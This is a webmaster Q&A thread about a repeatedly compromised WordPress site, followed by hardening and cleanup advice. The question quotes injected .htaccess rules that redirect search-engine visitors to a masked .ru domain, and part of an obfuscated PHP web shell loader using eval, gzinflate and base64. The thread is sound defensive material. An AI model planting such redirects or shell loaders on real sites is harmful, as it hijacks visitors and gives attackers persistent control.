# Clean an attacked website

Tags: botattack

Since few monts a client website is attacked by bots. I've changed the website source (now wordpress last version), try to clean but bot find hole in sécurity ...

After bot action i can find .htaccess files on the website with this inside:

```
ErrorDocument 400 http://**********.ru/upday/index.php
ErrorDocument 401 http://**********.ru/upday/index.php

[...]

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|
altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|
metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|
rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch
|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search
|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick
|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey
|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro
|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase
|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)

RewriteRule ^(.*)$ http://*******.ru/upday/index.php [R=301,L]

[...]
```

I can find in my log files the used file for add .htaccess:

```
77.84.28.xxx domain.tdl - [23/Feb/2012:00:00:00 +0100] "POST /fichiers/cookiemw5.php
 HTTP/1.1" 200 34 "-" "-"
```

With this code inside:

```
<?php $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;
$default_charset="Windows-1251";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A
\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64
\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4Ck
REqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHC
tPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEk
tN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzru
mVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWHZrmq5Yysm45z49jTyPXHncgdOQICcu
mz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/ruGNr96fS4A607PTg+gsaa9cpzk3fVIF18MLGL1OL+dGwj
AQzKhlHgTkLPCodOWCzQSCFI4 [...]
```

I delete .php files, .htaccess files, but they appears after hours or minutes ...
Whats is the proceed to find the hole / stop the bot attack ?

(it's on shared hosting (ovh.com)

Comment: possible duplicate of [Users often say my website is infected, but can't find any evidence of this?](http://webmasters.stackexchange.com/questions/25189/users-often-say-my-website-is-infected-but-cant-find-any-evidence-of-this)

Answer (score 10, accepted):

> **Basic Security Steps**

Since Wordpress is so popular there are a lot of [drive by hacks](http://wordpress.org/tags/malware) knocking around taking advantage of flaws in basic security. All Wordpress users should take the following basic and easy steps to protect themselves:-

- Do not use wp_ as the database table prefix, use any string of random characters that appeals.
- Turn off Wordpress DB errors.
- Make sure your directory's are set to chmod 755 and files 644.
- Use a [secure password generator](http://strongpasswordgenerator.com/) (use at least 15 characters).
- Do not use admin as a username.
- Place a blank .htaccess file in the wp-admin directory.
- [Read Wordpress hardening](https://wordpress.org/support/article/hardening-wordpress/)
- Check the Google Cache of your site for hidden malware.
- Remove `<meta name="generator" content="WordPress X.X.X" />` from your site's header by placing `remove_action('wp_head', 'wp_generator');` in your functions.php file (drive by attackers will not have an easy way to find which version they are targeting).

> **TimThumb Hack**

There also is a [very popular drive by hack associated with an old version of the popular tim thumb script](http://www.wpbeginner.com/wp-tutorials/how-to-fix-and-cleanup-the-timthumb-hack-in-wordpress/), which causes a lot of problems for webmasters. Check your uploads directory for php files and ensure you've upgraded to the latest version of the script to avoid this.

> **Advice**

I run about 10 different Wordpresses and have found the WP-Security plugin and account from [website defender](http://www.websitedefender.com/) invaluable, it scans your site regularly and reports on security errors, malware, and even page errors via email so you can be assured that you know when something goes wrong.

[WP-Firewall](http://wordpress.org/extend/plugins/wordpress-firewall-2/) is also very useful for defense against 0-Day exploits and [VirusTotal](https://www.virustotal.com/) is handy if you suspect an infection.

[Akismet](http://akismet.com/) and [Disqus.com](http://disqus.com/admin/install/) are useful tools for defending against comment spam, and you should read the [webmaster pros community wiki on this subject](https://webmasters.stackexchange.com/questions/25373/how-can-i-prevent-spam-on-sites-which-i-control).

> **Webmaster Tools**

You should also sign up to webmaster tools, **but if you suspect an infection, take all steps to find and clean it up first** or you may end up with Google warning your users that yours is a reported attack site.

If it detects an infection Google will send an email to all of the following addresses `abuse@, admin@, administrator@, contact@, info@, postmaster@, support@, webmaster@` so you should ensure that you have at least one of these in place and monitored.

> **Paid Removal Services / Where To Get Help**

There are also a number of sites which offer paid malware removal services, I would be **very suspicious** of these - many appear to be scams of one sort or another.

There is plenty of high quality help and support available **for free** in the [wordpress forums](http://wordpress.org/support/), here on webmaster pro's, the [wordpress stackexchange site](https://wordpress.stackexchange.com/) and on [stackoverflow](https://stackoverflow.com/). Don't pay for things you can fix on your own.

Comment: @bux no problem, check your uploads directory for executable files, that's the most common attack vector.

Comment: Can you elaborate on what the blank htaccess file in wp-admin does?

Comment: @joshuahedlund it was designed to block an attack which attempted to write a htaccess file into the wp-admin directory. I will be updating this advice shortly with some new code to password protect that area of the site and block access to it entirely.

Answer (score 8):

You need to completely remove every file from your website and do a fresh install of Wordpress. The odds are they uploaded files that allow them continuous access to your site. Unless you want to go file by file trying to figure out which one(s) they are a complete install from scratch is the best thing you can do.

Comment: Okey, no miracle solution hehe ^^ I've a photo folder with thousand files. It will be fun to check this part ^^

Comment: If you have a backup, doing a diff against this can be helpful too.